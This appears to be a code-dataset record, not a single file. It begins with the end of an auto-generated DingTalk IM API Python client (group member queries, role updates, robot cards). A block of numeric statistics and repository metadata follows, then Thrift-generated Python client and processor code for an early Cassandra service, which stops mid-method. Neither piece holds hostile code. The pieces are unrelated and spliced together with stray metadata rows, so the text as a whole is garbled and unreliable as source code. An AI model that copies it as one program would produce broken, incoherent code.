if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.GetSceneGroupMembersResponse(),
await self.do_roarequest_async('GetSceneGroupMembers', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/sceneGroups/members/query', 'json', req, runtime)
)
def update_the_group_roles_of_group_member(
self,
request: dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberRequest,
) -> dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberHeaders()
return self.update_the_group_roles_of_group_member_with_options(request, headers, runtime)
async def update_the_group_roles_of_group_member_async(
self,
request: dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberRequest,
) -> dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberHeaders()
return await self.update_the_group_roles_of_group_member_with_options_async(request, headers, runtime)
def update_the_group_roles_of_group_member_with_options(
self,
request: dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberRequest,
headers: dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.user_id):
body['userId'] = request.user_id
if not UtilClient.is_unset(request.open_role_ids):
body['openRoleIds'] = request.open_role_ids
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberResponse(),
self.do_roarequest('UpdateTheGroupRolesOfGroupMember', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/sceneGroups/members/groupRoles', 'json', req, runtime)
)
async def update_the_group_roles_of_group_member_with_options_async(
self,
request: dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberRequest,
headers: dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.user_id):
body['userId'] = request.user_id
if not UtilClient.is_unset(request.open_role_ids):
body['openRoleIds'] = request.open_role_ids
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.UpdateTheGroupRolesOfGroupMemberResponse(),
await self.do_roarequest_async('UpdateTheGroupRolesOfGroupMember', 'im_1.0', 'HTTP', 'PUT', 'AK', f'/v1.0/im/sceneGroups/members/groupRoles', 'json', req, runtime)
)
def send_robot_interactive_card(
self,
request: dingtalkim__1__0_models.SendRobotInteractiveCardRequest,
) -> dingtalkim__1__0_models.SendRobotInteractiveCardResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.SendRobotInteractiveCardHeaders()
return self.send_robot_interactive_card_with_options(request, headers, runtime)
async def send_robot_interactive_card_async(
self,
request: dingtalkim__1__0_models.SendRobotInteractiveCardRequest,
) -> dingtalkim__1__0_models.SendRobotInteractiveCardResponse:
runtime = util_models.RuntimeOptions()
headers = dingtalkim__1__0_models.SendRobotInteractiveCardHeaders()
return await self.send_robot_interactive_card_with_options_async(request, headers, runtime)
def send_robot_interactive_card_with_options(
self,
request: dingtalkim__1__0_models.SendRobotInteractiveCardRequest,
headers: dingtalkim__1__0_models.SendRobotInteractiveCardHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.SendRobotInteractiveCardResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.request_id):
body['RequestId'] = request.request_id
if not UtilClient.is_unset(request.ding_access_token_type):
body['dingAccessTokenType'] = request.ding_access_token_type
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_open_app_id):
body['dingOpenAppId'] = request.ding_open_app_id
if not UtilClient.is_unset(request.ding_uid):
body['dingUid'] = request.ding_uid
if not UtilClient.is_unset(request.card_template_id):
body['cardTemplateId'] = request.card_template_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.single_chat_receiver):
body['singleChatReceiver'] = request.single_chat_receiver
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.card_biz_id):
body['cardBizId'] = request.card_biz_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.robot_code):
body['robotCode'] = request.robot_code
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.send_options):
body['sendOptions'] = request.send_options
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.SendRobotInteractiveCardResponse(),
self.do_roarequest('SendRobotInteractiveCard', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/v1.0/robot/interactiveCards/send', 'json', req, runtime)
)
async def send_robot_interactive_card_with_options_async(
self,
request: dingtalkim__1__0_models.SendRobotInteractiveCardRequest,
headers: dingtalkim__1__0_models.SendRobotInteractiveCardHeaders,
runtime: util_models.RuntimeOptions,
) -> dingtalkim__1__0_models.SendRobotInteractiveCardResponse:
UtilClient.validate_model(request)
body = {}
if not UtilClient.is_unset(request.request_id):
body['RequestId'] = request.request_id
if not UtilClient.is_unset(request.ding_access_token_type):
body['dingAccessTokenType'] = request.ding_access_token_type
if not UtilClient.is_unset(request.ding_client_id):
body['dingClientId'] = request.ding_client_id
if not UtilClient.is_unset(request.ding_isv_org_id):
body['dingIsvOrgId'] = request.ding_isv_org_id
if not UtilClient.is_unset(request.ding_open_app_id):
body['dingOpenAppId'] = request.ding_open_app_id
if not UtilClient.is_unset(request.ding_uid):
body['dingUid'] = request.ding_uid
if not UtilClient.is_unset(request.card_template_id):
body['cardTemplateId'] = request.card_template_id
if not UtilClient.is_unset(request.open_conversation_id):
body['openConversationId'] = request.open_conversation_id
if not UtilClient.is_unset(request.single_chat_receiver):
body['singleChatReceiver'] = request.single_chat_receiver
if not UtilClient.is_unset(request.ding_token_grant_type):
body['dingTokenGrantType'] = request.ding_token_grant_type
if not UtilClient.is_unset(request.card_biz_id):
body['cardBizId'] = request.card_biz_id
if not UtilClient.is_unset(request.ding_suite_key):
body['dingSuiteKey'] = request.ding_suite_key
if not UtilClient.is_unset(request.robot_code):
body['robotCode'] = request.robot_code
if not UtilClient.is_unset(request.ding_org_id):
body['dingOrgId'] = request.ding_org_id
if not UtilClient.is_unset(request.card_data):
body['cardData'] = request.card_data
if not UtilClient.is_unset(request.ding_oauth_app_id):
body['dingOauthAppId'] = request.ding_oauth_app_id
if not UtilClient.is_unset(request.send_options):
body['sendOptions'] = request.send_options
real_headers = {}
if not UtilClient.is_unset(headers.common_headers):
real_headers = headers.common_headers
if not UtilClient.is_unset(headers.x_acs_dingtalk_access_token):
real_headers['x-acs-dingtalk-access-token'] = headers.x_acs_dingtalk_access_token
req = open_api_models.OpenApiRequest(
headers=real_headers,
body=OpenApiUtilClient.parse_to_map(body)
)
return TeaCore.from_map(
dingtalkim__1__0_models.SendRobotInteractiveCardResponse(),
await self.do_roarequest_async('SendRobotInteractiveCard', 'im_1.0', 'HTTP', 'POST', 'AK', f'/v1.0/im/v1.0/robot/interactiveCards/send', 'json', req, runtime)
)
| 53.544108
| 175
| 0.705318
| 9,562
| 83,154
| 5.725267
| 0.027818
| 0.034158
| 0.102475
| 0.116138
| 0.985843
| 0.974208
| 0.966243
| 0.952361
| 0.937255
| 0.925601
| 0
| 0.008354
| 0.209659
| 83,154
| 1,552
| 176
| 53.578608
| 0.82465
| 0.000962
| 0
| 0.868598
| 1
| 0
| 0.083819
| 0.026944
| 0
| 0
| 0
| 0
| 0
| 1
| 0.020889
| false
| 0
| 0.004717
| 0
| 0.066712
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
378b3b41bcdf00909372c6a02716f537f007a4da
| 67,618
|
py
|
Python
|
interface/py/com/facebook/infrastructure/service/Cassandra.py
|
jiansheng/cassandra
|
3b4bac8e561f5a4c2e0873226cd50a5b6cad305c
|
[
"Apache-2.0"
] | 2
|
2015-11-25T10:42:06.000Z
|
2016-05-08T13:38:27.000Z
|
interface/py/com/facebook/infrastructure/service/Cassandra.py
|
jtrutna/cassandra
|
3b4bac8e561f5a4c2e0873226cd50a5b6cad305c
|
[
"Apache-2.0"
] | null | null | null |
interface/py/com/facebook/infrastructure/service/Cassandra.py
|
jtrutna/cassandra
|
3b4bac8e561f5a4c2e0873226cd50a5b6cad305c
|
[
"Apache-2.0"
] | 1
|
2019-05-02T22:02:54.000Z
|
2019-05-02T22:02:54.000Z
|
#
# Autogenerated by Thrift
#
# DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING
#
from thrift.Thrift import *
import fb303.FacebookService
from ttypes import *
from thrift.Thrift import TProcessor
from thrift.transport import TTransport
from thrift.protocol import TBinaryProtocol
try:
from thrift.protocol import fastbinary
except:
fastbinary = None
class Iface(fb303.FacebookService.Iface):
def get_slice(self, tablename, key, columnFamily_column, start, count):
pass
def get_column(self, tablename, key, columnFamily_column):
pass
def get_column_count(self, tablename, key, columnFamily_column):
pass
def insert_blocking(self, tablename, key, columnFamily_column, cellData, timestamp):
pass
def insert(self, tablename, key, columnFamily_column, cellData, timestamp):
pass
def batch_insert(self, batchMutation):
pass
def batch_insert_blocking(self, batchMutation):
pass
def remove(self, tablename, key, columnFamily_column):
pass
def get_slice_super(self, tablename, key, columnFamily_superColumnName, start, count):
pass
def get_superColumn(self, tablename, key, columnFamily):
pass
def batch_insert_superColumn(self, batchMutationSuper):
pass
def batch_insert_superColumn_blocking(self, batchMutationSuper):
pass
class Client(fb303.FacebookService.Client, Iface):
def __init__(self, iprot, oprot=None):
fb303.FacebookService.Client.__init__(self, iprot, oprot)
def get_slice(self, tablename, key, columnFamily_column, start, count):
self.send_get_slice(tablename, key, columnFamily_column, start, count)
return self.recv_get_slice()
def send_get_slice(self, tablename, key, columnFamily_column, start, count):
self._oprot.writeMessageBegin('get_slice', TMessageType.CALL, self._seqid)
args = get_slice_args()
args.tablename = tablename
args.key = key
args.columnFamily_column = columnFamily_column
args.start = start
args.count = count
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_slice(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_slice_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_slice failed: unknown result");
def get_column(self, tablename, key, columnFamily_column):
self.send_get_column(tablename, key, columnFamily_column)
return self.recv_get_column()
def send_get_column(self, tablename, key, columnFamily_column):
self._oprot.writeMessageBegin('get_column', TMessageType.CALL, self._seqid)
args = get_column_args()
args.tablename = tablename
args.key = key
args.columnFamily_column = columnFamily_column
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_column(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_column_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_column failed: unknown result");
def get_column_count(self, tablename, key, columnFamily_column):
self.send_get_column_count(tablename, key, columnFamily_column)
return self.recv_get_column_count()
def send_get_column_count(self, tablename, key, columnFamily_column):
self._oprot.writeMessageBegin('get_column_count', TMessageType.CALL, self._seqid)
args = get_column_count_args()
args.tablename = tablename
args.key = key
args.columnFamily_column = columnFamily_column
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_column_count(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_column_count_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_column_count failed: unknown result");
def insert_blocking(self, tablename, key, columnFamily_column, cellData, timestamp):
self.send_insert_blocking(tablename, key, columnFamily_column, cellData, timestamp)
self.recv_insert_blocking()
def send_insert_blocking(self, tablename, key, columnFamily_column, cellData, timestamp):
self._oprot.writeMessageBegin('insert_blocking', TMessageType.CALL, self._seqid)
args = insert_blocking_args()
args.tablename = tablename
args.key = key
args.columnFamily_column = columnFamily_column
args.cellData = cellData
args.timestamp = timestamp
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_insert_blocking(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = insert_blocking_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
return
def insert(self, tablename, key, columnFamily_column, cellData, timestamp):
self.send_insert(tablename, key, columnFamily_column, cellData, timestamp)
def send_insert(self, tablename, key, columnFamily_column, cellData, timestamp):
self._oprot.writeMessageBegin('insert', TMessageType.CALL, self._seqid)
args = insert_args()
args.tablename = tablename
args.key = key
args.columnFamily_column = columnFamily_column
args.cellData = cellData
args.timestamp = timestamp
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def batch_insert(self, batchMutation):
self.send_batch_insert(batchMutation)
def send_batch_insert(self, batchMutation):
self._oprot.writeMessageBegin('batch_insert', TMessageType.CALL, self._seqid)
args = batch_insert_args()
args.batchMutation = batchMutation
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def batch_insert_blocking(self, batchMutation):
self.send_batch_insert_blocking(batchMutation)
return self.recv_batch_insert_blocking()
def send_batch_insert_blocking(self, batchMutation):
self._oprot.writeMessageBegin('batch_insert_blocking', TMessageType.CALL, self._seqid)
args = batch_insert_blocking_args()
args.batchMutation = batchMutation
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_batch_insert_blocking(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = batch_insert_blocking_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "batch_insert_blocking failed: unknown result");
def remove(self, tablename, key, columnFamily_column):
self.send_remove(tablename, key, columnFamily_column)
def send_remove(self, tablename, key, columnFamily_column):
self._oprot.writeMessageBegin('remove', TMessageType.CALL, self._seqid)
args = remove_args()
args.tablename = tablename
args.key = key
args.columnFamily_column = columnFamily_column
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def get_slice_super(self, tablename, key, columnFamily_superColumnName, start, count):
self.send_get_slice_super(tablename, key, columnFamily_superColumnName, start, count)
return self.recv_get_slice_super()
def send_get_slice_super(self, tablename, key, columnFamily_superColumnName, start, count):
self._oprot.writeMessageBegin('get_slice_super', TMessageType.CALL, self._seqid)
args = get_slice_super_args()
args.tablename = tablename
args.key = key
args.columnFamily_superColumnName = columnFamily_superColumnName
args.start = start
args.count = count
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_slice_super(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_slice_super_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_slice_super failed: unknown result");
def get_superColumn(self, tablename, key, columnFamily):
self.send_get_superColumn(tablename, key, columnFamily)
return self.recv_get_superColumn()
def send_get_superColumn(self, tablename, key, columnFamily):
self._oprot.writeMessageBegin('get_superColumn', TMessageType.CALL, self._seqid)
args = get_superColumn_args()
args.tablename = tablename
args.key = key
args.columnFamily = columnFamily
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_get_superColumn(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = get_superColumn_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "get_superColumn failed: unknown result");
def batch_insert_superColumn(self, batchMutationSuper):
self.send_batch_insert_superColumn(batchMutationSuper)
def send_batch_insert_superColumn(self, batchMutationSuper):
self._oprot.writeMessageBegin('batch_insert_superColumn', TMessageType.CALL, self._seqid)
args = batch_insert_superColumn_args()
args.batchMutationSuper = batchMutationSuper
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def batch_insert_superColumn_blocking(self, batchMutationSuper):
self.send_batch_insert_superColumn_blocking(batchMutationSuper)
return self.recv_batch_insert_superColumn_blocking()
def send_batch_insert_superColumn_blocking(self, batchMutationSuper):
self._oprot.writeMessageBegin('batch_insert_superColumn_blocking', TMessageType.CALL, self._seqid)
args = batch_insert_superColumn_blocking_args()
args.batchMutationSuper = batchMutationSuper
args.write(self._oprot)
self._oprot.writeMessageEnd()
self._oprot.trans.flush()
def recv_batch_insert_superColumn_blocking(self, ):
(fname, mtype, rseqid) = self._iprot.readMessageBegin()
if mtype == TMessageType.EXCEPTION:
x = TApplicationException()
x.read(self._iprot)
self._iprot.readMessageEnd()
raise x
result = batch_insert_superColumn_blocking_result()
result.read(self._iprot)
self._iprot.readMessageEnd()
if result.success != None:
return result.success
raise TApplicationException(TApplicationException.MISSING_RESULT, "batch_insert_superColumn_blocking failed: unknown result");
class Processor(fb303.FacebookService.Processor, Iface, TProcessor):
def __init__(self, handler):
fb303.FacebookService.Processor.__init__(self, handler)
self._processMap["get_slice"] = Processor.process_get_slice
self._processMap["get_column"] = Processor.process_get_column
self._processMap["get_column_count"] = Processor.process_get_column_count
self._processMap["insert_blocking"] = Processor.process_insert_blocking
self._processMap["insert"] = Processor.process_insert
self._processMap["batch_insert"] = Processor.process_batch_insert
self._processMap["batch_insert_blocking"] = Processor.process_batch_insert_blocking
self._processMap["remove"] = Processor.process_remove
self._processMap["get_slice_super"] = Processor.process_get_slice_super
self._processMap["get_superColumn"] = Processor.process_get_superColumn
self._processMap["batch_insert_superColumn"] = Processor.process_batch_insert_superColumn
self._processMap["batch_insert_superColumn_blocking"] = Processor.process_batch_insert_superColumn_blocking
def process(self, iprot, oprot):
(name, type, seqid) = iprot.readMessageBegin()
if name not in self._processMap:
iprot.skip(TType.STRUCT)
iprot.readMessageEnd()
x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name))
oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid)
x.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
return
else:
self._processMap[name](self, seqid, iprot, oprot)
return True
def process_get_slice(self, seqid, iprot, oprot):
args = get_slice_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_slice_result()
result.success = self._handler.get_slice(args.tablename, args.key, args.columnFamily_column, args.start, args.count)
oprot.writeMessageBegin("get_slice", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_column(self, seqid, iprot, oprot):
args = get_column_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_column_result()
result.success = self._handler.get_column(args.tablename, args.key, args.columnFamily_column)
oprot.writeMessageBegin("get_column", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_column_count(self, seqid, iprot, oprot):
args = get_column_count_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_column_count_result()
result.success = self._handler.get_column_count(args.tablename, args.key, args.columnFamily_column)
oprot.writeMessageBegin("get_column_count", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_insert_blocking(self, seqid, iprot, oprot):
args = insert_blocking_args()
args.read(iprot)
iprot.readMessageEnd()
result = insert_blocking_result()
self._handler.insert_blocking(args.tablename, args.key, args.columnFamily_column, args.cellData, args.timestamp)
oprot.writeMessageBegin("insert_blocking", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_insert(self, seqid, iprot, oprot):
args = insert_args()
args.read(iprot)
iprot.readMessageEnd()
self._handler.insert(args.tablename, args.key, args.columnFamily_column, args.cellData, args.timestamp)
return
def process_batch_insert(self, seqid, iprot, oprot):
args = batch_insert_args()
args.read(iprot)
iprot.readMessageEnd()
self._handler.batch_insert(args.batchMutation)
return
def process_batch_insert_blocking(self, seqid, iprot, oprot):
args = batch_insert_blocking_args()
args.read(iprot)
iprot.readMessageEnd()
result = batch_insert_blocking_result()
result.success = self._handler.batch_insert_blocking(args.batchMutation)
oprot.writeMessageBegin("batch_insert_blocking", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_remove(self, seqid, iprot, oprot):
args = remove_args()
args.read(iprot)
iprot.readMessageEnd()
self._handler.remove(args.tablename, args.key, args.columnFamily_column)
return
def process_get_slice_super(self, seqid, iprot, oprot):
args = get_slice_super_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_slice_super_result()
result.success = self._handler.get_slice_super(args.tablename, args.key, args.columnFamily_superColumnName, args.start, args.count)
oprot.writeMessageBegin("get_slice_super", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_get_superColumn(self, seqid, iprot, oprot):
args = get_superColumn_args()
args.read(iprot)
iprot.readMessageEnd()
result = get_superColumn_result()
result.success = self._handler.get_superColumn(args.tablename, args.key, args.columnFamily)
oprot.writeMessageBegin("get_superColumn", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
def process_batch_insert_superColumn(self, seqid, iprot, oprot):
args = batch_insert_superColumn_args()
args.read(iprot)
iprot.readMessageEnd()
self._handler.batch_insert_superColumn(args.batchMutationSuper)
return
def process_batch_insert_superColumn_blocking(self, seqid, iprot, oprot):
args = batch_insert_superColumn_blocking_args()
args.read(iprot)
iprot.readMessageEnd()
result = batch_insert_superColumn_blocking_result()
result.success = self._handler.batch_insert_superColumn_blocking(args.batchMutationSuper)
oprot.writeMessageBegin("batch_insert_superColumn_blocking", TMessageType.REPLY, seqid)
result.write(oprot)
oprot.writeMessageEnd()
oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class get_slice_args:
thrift_spec = None
def __init__(self, d=None):
self.tablename = None
self.key = None
self.columnFamily_column = None
self.start = -1
self.count = -1
if isinstance(d, dict):
if 'tablename' in d:
self.tablename = d['tablename']
if 'key' in d:
self.key = d['key']
if 'columnFamily_column' in d:
self.columnFamily_column = d['columnFamily_column']
if 'start' in d:
self.start = d['start']
if 'count' in d:
self.count = d['count']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == -1:
if ftype == TType.STRING:
self.tablename = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -2:
if ftype == TType.STRING:
self.key = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -3:
if ftype == TType.STRING:
self.columnFamily_column = iprot.readString();
else:
iprot.skip(ftype)
elif fid == -4:
if ftype == TType.I32:
self.start = iprot.readI32();
else:
iprot.skip(ftype)
elif fid == -5:
if ftype == TType.I32:
self.count = iprot.readI32();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('get_slice_args')
if self.tablename != None:
oprot.writeFieldBegin('tablename', TType.STRING, -1)
oprot.writeString(self.tablename)
oprot.writeFieldEnd()
if self.key != None:
oprot.writeFieldBegin('key', TType.STRING, -2)
oprot.writeString(self.key)
oprot.writeFieldEnd()
if self.columnFamily_column != None:
oprot.writeFieldBegin('columnFamily_column', TType.STRING, -3)
oprot.writeString(self.columnFamily_column)
oprot.writeFieldEnd()
if self.start != None:
oprot.writeFieldBegin('start', TType.I32, -4)
oprot.writeI32(self.start)
oprot.writeFieldEnd()
if self.count != None:
oprot.writeFieldBegin('count', TType.I32, -5)
oprot.writeI32(self.count)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def __str__(self):
return str(self.__dict__)
def __repr__(self):
return repr(self.__dict__)
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class get_slice_result:
thrift_spec = (
(0, TType.LIST, 'success', (TType.STRUCT,(column_t, column_t.thrift_spec)), None, ), # 0
)
def __init__(self, d=None):
self.success = None
if isinstance(d, dict):
if 'success' in d:
self.success = d['success']
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.LIST:
self.success = []
(_etype42, _size39) = iprot.readListBegin()
for _i43 in xrange(_size39):
_elem44 = column_t()
_elem44.read(iprot)
self.success.append(_elem44)
iprot.readListEnd()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
